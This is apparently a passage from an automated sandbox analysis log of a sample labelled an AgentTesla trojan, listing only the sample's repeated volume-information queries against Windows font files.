                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
